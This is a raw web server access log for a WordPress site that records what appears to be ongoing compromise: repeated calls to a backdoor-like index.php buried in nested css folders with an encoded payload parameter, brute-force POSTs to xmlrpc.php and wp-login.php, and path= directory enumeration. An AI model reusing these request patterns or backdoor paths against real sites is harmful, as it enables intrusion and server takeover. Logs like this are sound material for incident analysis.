65.21.62.83 - - [16/Oct/2025:19:07:22 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/53.0.2907.99"
57.141.0.40 - - [16/Oct/2025:19:07:32 -0400] "GET /market/2274798694.htm HTTP/1.0" 200 102732 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
142.4.205.1 - - [16/Oct/2025:19:06:37 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393539372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635353939372q6664666666376530326631396335383436656265316232353463623564333266222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:19:06:57 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393631372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635363031372q3837623433353039616266316564626531396564363462323639353432613131222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
69.197.179.242 - - [16/Oct/2025:19:06:49 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 200 4087 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
142.4.205.1 - - [16/Oct/2025:19:07:17 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393633372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635363033372q3536623935313663616137326261336233343633343835313931643236373265222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
57.141.0.66 - - [16/Oct/2025:19:08:30 -0400] "GET /market/2274789666.htm HTTP/1.0" 200 102732 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
114.119.129.33 - - [16/Oct/2025:19:08:33 -0400] "GET /2025/10/08/togel-digital-era-explained/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks/list HTTP/1.0" 200 7197 "https://academiedumarketing.com/2025/10/08/togel-digital-era-explained/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [16/Oct/2025:19:07:37 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393635372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635363035372q6139393539633035353263376533316430303765353333656332303832666163222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:19:07:57 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393637372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635363037372q6534393863613863343933663730643732346162646337313632316265333062222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
54.92.171.106 - - [16/Oct/2025:19:09:06 -0400] "GET /2025/10/03/best-strategies-for-togel-players/?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/wp-load.php&path=/var/www/vhosts/academiedumarketing.com/public_html HTTP/1.0" 200 8446 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
142.4.205.1 - - [16/Oct/2025:19:08:17 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393639372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635363039372q3765363532316161333938323964373165656161353336363837346562306462222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:19:08:37 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393731372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635363131372q6635633632303337353464343732613333656233373835613537303430656133222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
69.197.179.242 - - [16/Oct/2025:19:08:16 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 200 4087 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
142.4.205.1 - - [16/Oct/2025:19:08:57 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393733372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635363133372q6138343064303736386636626331336434356438356433616266333337663239222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.145.188 - - [16/Oct/2025:19:09:57 -0400] "GET /author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks/widget-group HTTP/1.0" 200 7124 "https://academiedumarketing.com/author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
51.75.18.6 - - [16/Oct/2025:19:10:00 -0400] "GET /?path=/var/www/vhosts/academiedumarketing.com/public_html/AvEhfIyetYTWjiR HTTP/1.0" 200 7200 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
142.4.205.1 - - [16/Oct/2025:19:09:17 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393735372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635363135372q6365386566616464666466633334393030613938316635343233303365636138222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:19:09:37 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393737372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635363137372q3937313961383835633933623230353361323763313461303062303837333130222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
57.129.81.224 - - [16/Oct/2025:19:10:47 -0400] "GET /?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes HTTP/1.0" 200 16402 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
142.4.205.1 - - [16/Oct/2025:19:09:57 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393739372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635363139372q6662623430396465313161316363306434613431613034643761626365663964222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
69.197.179.242 - - [16/Oct/2025:19:09:47 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 200 4087 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
142.4.205.1 - - [16/Oct/2025:19:10:17 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393831372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635363231372q3739623239326139363732323539393136366238613239633934303131663566222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.136.5 - - [16/Oct/2025:19:11:22 -0400] "GET /author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/SimplePie/library/SimplePie/Cache HTTP/1.0" 200 7325 "https://academiedumarketing.com/author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/SimplePie/library/SimplePie" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [16/Oct/2025:19:10:37 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393833372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635363233372q6431643235636231383433333131623733653664323932656163393932333365222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:19:10:57 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393835372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635363235372q3731373863333336663730393965353736343135303461316662303833373264222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
103.13.208.232 - - [16/Oct/2025:19:12:01 -0400] "GET /wp-login.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; MAARJS; rv:11.0) like Gecko"
103.13.208.232 - - [16/Oct/2025:19:12:09 -0400] "POST /wp-login.php HTTP/1.0" 200 9227 "https://academiedumarketing.com/wp-login.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; MAARJS; rv:11.0) like Gecko"
57.141.0.6 - - [16/Oct/2025:19:12:12 -0400] "GET /market/2274586959.htm?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-admin HTTP/1.0" 200 180007 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
142.4.205.1 - - [16/Oct/2025:19:11:17 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393837372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635363237372q6362376433343632363732636661343665613930353939346263353935313462222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:19:11:37 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393839372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635363239372q3736323932383663343135326461643164633863653363323961613836393830222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
69.197.179.242 - - [16/Oct/2025:19:11:19 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 200 4087 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
114.119.146.77 - - [16/Oct/2025:19:12:46 -0400] "GET /author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/public_html/aAqlKLnxmZitXs/aAqlKLnxmZitXs HTTP/1.0" 200 7212 "https://academiedumarketing.com/author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/public_html/aAqlKLnxmZitXs" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [16/Oct/2025:19:11:57 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393931372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635363331372q3734313361656462653465613264386461303937666164663766323462646530222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:19:12:17 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393933372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635363333372q6638613132383835333263663831346263343961366139623832646639616665222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:19:12:37 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393935372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635363335372q3930383263643564363532613661363537393361316633323365323362633966222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.196 - - [16/Oct/2025:19:13:39 -0400] "GET /?_g=2443103 HTTP/1.0" 200 23925 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:19:12:57 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393937372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635363337372q3039653862653766623263373331636561323431643332353537303039346639222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.128.196 - - [16/Oct/2025:19:14:08 -0400] "GET /2025/10/?path=/var/www/vhosts/academiedumarketing.com/softaculous_backups HTTP/1.0" 200 7114 "https://academiedumarketing.com/2025/10/?path=/var/www/vhosts/academiedumarketing.com" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
139.59.60.172 - - [16/Oct/2025:19:14:11 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0"
69.197.179.242 - - [16/Oct/2025:19:12:46 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 200 4087 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
139.59.60.172 - - [16/Oct/2025:19:14:13 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0"
139.59.60.172 - - [16/Oct/2025:19:14:15 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0"
142.4.205.1 - - [16/Oct/2025:19:13:17 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303635393939372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635363339372q3436313130663935613165333036623866313161316463623830343733333734222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
139.59.60.172 - - [16/Oct/2025:19:14:16 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0"
139.59.60.172 - - [16/Oct/2025:19:14:18 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0"
139.59.60.172 - - [16/Oct/2025:19:14:19 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0"
142.4.205.1 - - [16/Oct/2025:19:13:37 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303636303031372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303635363431372q6432613763336230393433643038613563333937396362373966633765313231222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
